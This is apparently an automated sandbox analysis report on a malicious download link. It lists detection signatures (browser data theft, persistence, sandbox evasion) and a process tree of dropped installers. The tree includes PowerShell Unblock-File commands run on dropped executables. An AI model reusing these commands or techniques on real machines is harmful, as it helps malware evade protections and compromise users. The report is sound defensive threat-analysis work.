Analysis
-
max time kernel
1800s -
max time network
1800s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
15/07/2024, 07:09
General
-
Target
https://ify.ac/1Ic5
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in System32 directory 33 IoCs
-
Drops file in Program Files directory 20 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
-
NSIS installer 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 10 IoCs
-
Modifies Control Panel 27 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 6 IoCs
-
Modifies system certificate store 2 TTPs 6 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 56 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1Ic51⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffbe5746f8,0x7fffbe574708,0x7fffbe5747182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5076 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6760 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2032 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11575144536623438762,13971208093515241663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:12⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\setup_a1mtEJnIGn.exe"C:\Users\Admin\Desktop\setup_a1mtEJnIGn.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BQLQC.tmp\setup_a1mtEJnIGn.tmp"C:\Users\Admin\AppData\Local\Temp\is-BQLQC.tmp\setup_a1mtEJnIGn.tmp" /SL5="$5029A,6251072,56832,C:\Users\Admin\Desktop\setup_a1mtEJnIGn.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "studio_two_7151"3⤵
-
-
C:\Users\Admin\AppData\Local\Studio Two\studiotwo.exe"C:\Users\Admin\AppData\Local\Studio Two\studiotwo.exe" 8fa18a6fe78d07028212c3c3fa3b53603⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 8804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 8964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 9564⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 10804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 11004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 11004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 11684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 12044⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 11284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 9964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 13364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 10084⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 9964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 13684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 17964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 12684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 19244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21164⤵
- Program crash
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/bboobies4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffbe5746f8,0x7fffbe574708,0x7fffbe5747185⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 15404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 14164⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 11324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 20044⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 20444⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 20004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 11324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18044⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 22364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 15364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 22044⤵
- Program crash
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\C1mTBuwe\Mw2w99QrFU.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\C1mTBuwe\Mw2w99QrFU.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\yurGBfOP\Y1S4BSqVoIgnK7nc01x9.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\yurGBfOP\Y1S4BSqVoIgnK7nc01x9.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21284⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\C1mTBuwe\Mw2w99QrFU.exeC:\Users\Admin\AppData\Local\Temp\C1mTBuwe\Mw2w99QrFU.exe --silent --allusers=04⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4D196AD9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4D196AD9\setup.exe --silent --allusers=0 --server-tracking-blob=ZDEwOWY4MjE4YTVlNmY4ZDFhZWMwODdlZWRjMzc3YjAzNWFjM2FhYmQ2ZTYzODYzZTE1MjZiZTM4MGFkNjQ1NDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjEwMjc1MzkuOTA0OSIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiYmFhOWU0Y2YtODdmYS00NzM2LWE5YTQtMzc1NjZmMDlhZTcwIn0=5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\7zS4D196AD9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4D196AD9\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x330,0x334,0x338,0x310,0x33c,0x721db1f4,0x721db200,0x721db20c6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4D196AD9\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS4D196AD9\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=556 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240715071223" --session-guid=8809bc6e-40ca-4ff9-9069-c1da833d2673 --server-tracking-blob=NjE0ZmQxODI5YTgzNzA1ZjJhMjA2YmRkMjlmMzg1NWRkNjA3ZDhkZGNmNmFjNDNiZjM4ODMxODY4MmUyNDdlODp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTAyNzUzOS45MDQ5IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiJiYWE5ZTRjZi04N2ZhLTQ3MzYtYTlhNC0zNzU2NmYwOWFlNzAifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=04060000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\AppData\Local\Temp\7zS4D196AD9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4D196AD9\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x320,0x324,0x328,0x300,0x32c,0x7181b1f4,0x7181b200,0x7181b20c7⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407150712231\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407150712231\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407150712231\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407150712231\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407150712231\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407150712231\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x2e9f88,0x2e9f94,0x2e9fa07⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 23004⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\yurGBfOP\Y1S4BSqVoIgnK7nc01x9.exeC:\Users\Admin\AppData\Local\Temp\yurGBfOP\Y1S4BSqVoIgnK7nc01x9.exe /sid=3 /pid=10904⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exeC:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
